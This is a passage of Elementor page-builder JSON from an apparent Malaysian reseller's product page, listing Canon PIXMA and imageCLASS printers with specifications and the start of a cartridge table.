pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1ba38c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9b84d1c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"37\",\"right\":\"37\",\"bottom\":\"37\",\"left\":\"37\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"19ec1cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"d3a1ece\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E4270\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"47167d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\",\"id\":2346}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"c56690e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing<\\/p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.<\\/p><p>Print, Scan, Copy, Fax<\\/p><p>ISO standard print speed (A4): 8.8ipm black \\/ 4.4ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct<\\/p><p>Recommended print volume: 50 - 200 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"189f9a2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"df0825f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"11\\\" ]<\\/span><\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"31\",\"right\":\"31\",\"bottom\":\"31\",\"left\":\"31\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"692b43d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a99e262\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS9570\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6a04479\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\",\"id\":2347}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ab42ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>A3 Wireless Photo Printer with Large 4.3\\u201d Touch-Screen and Auto Document Feeder<\\/p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless\\/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 80 - 300 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"657c5e2\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1c9048c\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS8270\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e5da999\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\",\"id\":2348}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8c06b04\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless Photo All-In-One with Large 4.3\\u201d Touch-Screen and Auto Duplex Printing<\\/p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.<\\/p><p>Available in Black, Red and White.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 30 - 100 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"89b9be8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center><\\/center><center><\\/center><center><\\/center><center><\\/center><center><\\/center><center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"11\",\"right\":\"11\",\"bottom\":\"11\",\"left\":\"11\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e19c5ed\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"48b8328\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"619d0d9\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G2010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b641ed3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\",\"id\":2349}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"cb6e9e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f95d9d7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ef95652\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"72caeea\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G4010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a96790\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/095399e7118a4e898b6df8c1808358de_g4010_03.png\",\"id\":2351}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"bc59f5a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost.<\\/p><p>Print, Scan, Copy and Fax<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49effc0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"79b85a4\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G1010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4266d0e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\",\"id\":2352}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"79cfa28\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Printer for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) \\/ 5.0ipm (colour)<\\/p><p>Photo Speed (4 x 6\\\"): 60sec. (borderless)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"23b0d26\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"137f63f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"28\",\"right\":\"28\",\"bottom\":\"28\",\"left\":\"28\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"35746a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9b7f21a\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G3010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b8c2962\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\",\"id\":2721}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ca1fadd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1ffb94f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"84b94b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"130ead1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Laser Printers :-\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"219f45c\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"39c2015\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ece285e\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1273d18\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\",\"id\":2724}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6b60692\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact with wireless connectivity<\\/strong><\\/p><\\/div><p>Simple to operate and compact in size, the ideal choice for your printing needs.<\\/p><ul class=\\\"list-normal\\\"><li>Print<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>First Print Out Time (A4): Approx. 6.5 sec<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><li>Mobile Connectivity.<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e0baf05\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c3f6907\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"50\",\"bottom\":\"50\",\"left\":\"50\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f6acb91\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"001a8d3\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF269dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a672fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\",\"id\":2725}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"fb9d4fc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)<\\/strong><\\/p>\\n\\n<\\/div>\\nEnjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy, Fax<\\/li>\\n \\t<li>Print Speed (A4): Up to 28ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>FPOT: Approx. 5.2 sec<\\/li>\\n \\t<li>Max. paper input capacity: 251 sheets<\\/li>\\n \\t<li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4f2ce8e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2a9b750\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"13\",\"right\":\"13\",\"bottom\":\"13\",\"left\":\"13\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1f6f8ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a880ac9\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF266dn\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d63382c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\",\"id\":2726}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"73a1481\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Mobile Printing and Network<\\/strong><\\/p>\\n\\n<\\/div>\\nFeaturing Network printing and SEND technology, MF266dn is the productive choice for your business operations.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy, Fax<\\/li>\\n \\t<li>Print Speed (A4): Up to 28ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>FPOT: Approx. 5.2 sec<\\/li>\\n \\t<li>Max. paper input capacity: 251 sheets<\\/li>\\n \\t<li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2fabcd2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"0a62d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"13\",\"right\":\"13\",\"bottom\":\"13\",\"left\":\"13\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0e45d15\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"04de22f\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"790e84e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\",\"id\":2727}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"880dc7e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges<\\/strong><\\/p>\\n\\n<\\/div>\\nSimple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy<\\/li>\\n \\t<li>Print Speed (A4): Up to 22ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>FPOT: Approx. 6.5 sec<\\/li>\\n \\t<li>Max. paper input capacity: Up to 150 sheets<\\/li>\\n \\t<li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li>\\n<\\/ul>\\n<center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bdfedb6\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"55572b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"00c113d\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"77e13da\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\",\"id\":2728}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"2036878\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<div class=\\\"overview-head\\\">\\n<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity<\\/strong><\\/p>\\n\\n<\\/div>\\nSimple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy<\\/li>\\n \\t<li>Print Speed (A4): Up to 22ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>FPOT: Approx. 6.5 sec<\\/li>\\n \\t<li>Max. paper input capacity: Up to 150 sheets<\\/li>\\n \\t<li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li>\\n<\\/ul>\\n<center>[maxbutton id=\\\"11\\\" ]<\\/center>\\n\\n<\\/div>\\n<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cd5acb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7671e33\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d405a8d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\",\"id\":2730}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9ac8d27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>Compact with wireless connectivity, bundled with 3 cartridges<\\/strong><\\/p>\\n\\n<\\/div>\\nKeep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print<\\/li>\\n \\t<li>Print Speed (A4): Up to 22ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>First Print Out Time (A4): Approx. 6.5 sec<\\/li>\\n \\t<li>Print Resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li>\\n \\t<li>Mobile Printing<\\/li>\\n<\\/ul><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"dfd3898\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98ff69a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9dc3933\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF525x\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bdbe9d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\",\"id\":2731}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"7b20d6b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n\\nSmarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy, Fax<\\/li>\\n \\t<li>Print Speed (A4): Up to 43ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 2,000 - 7,500 pages<\\/li>\\n \\t<li>FPOT: 6.2secs. (A4)<\\/li>\\n \\t<li>Max. paper input capacity: Up to 2,300 sheets<\\/li>\\n \\t<li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li>\\n<\\/ul>\\n<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f0eb648\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f3b97a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ef6036c\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF426dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1e51740\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\",\"id\":2732}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ca5e93\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>Compact 4-in-1 Black and White Multifunction for the smart business<\\/strong><\\/p>\\n\\n<\\/div>\\nWith cutting-edge features, the MF426dw is set to boost work productivity in the modern office.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy, Fax<\\/li>\\n \\t<li>Print Speed (A4): Up to 38ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 750 - 4,000 pages<\\/li>\\n \\t<li>FPOT: 5.5secs. (A4)<\\/li>\\n \\t<li>Max. paper input capacity: Up to 900 sheets<\\/li>\\n \\t<li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li>\\n<\\/ul>\\n<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2a7e17a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9f4fce1\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"45b0f85\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d249821\",\"elType\":\"widget\",\"settings\":{\"title\":\"Cartridge Printers :-\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2dd6823\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"d81a183\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62697a3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table border=\\\"1\\\" width=\\\"378\\\">\\n<tbody>\\n<tr align=\\\"center\\\">\\n<td width=\\\"170\\\"><strong>Model<\\/strong><\\/td>\\n<td width=\\\"208\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"13\\\" align=\\\"center\\\">imagePROGRAF PRO-500<\\/td>\\n<td>Maintenance Cartridge MC-20<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Blue)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Chroma Optimizer)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Gray)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 